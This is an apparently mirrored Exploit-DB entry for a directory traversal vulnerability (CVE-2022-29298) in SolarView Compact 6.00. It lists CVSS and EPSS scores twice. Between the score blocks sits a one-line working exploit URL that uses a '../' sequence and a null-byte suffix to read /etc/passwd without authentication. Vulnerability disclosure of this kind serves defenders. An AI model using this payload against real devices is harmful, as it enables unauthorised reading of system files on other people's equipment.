Lucene search

Ahmed AlrokyEDB-ID:50950

HistoryJun 03, 2022 - 12:00 a.m.

SolarView Compact 6.00 - Directory Traversal

2022-06-0300:00:00

Ahmed Alroky

www.exploit-db.com

212

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.137 Low

EPSS

Percentile

95.7%

JSON

# Exploit Title: SolarView Compact 6.00 - Directory Traversal
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29298

# Tested on: Windows

# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.137 Low

EPSS

Percentile

95.7%

JSON

Related for EDB-ID:50950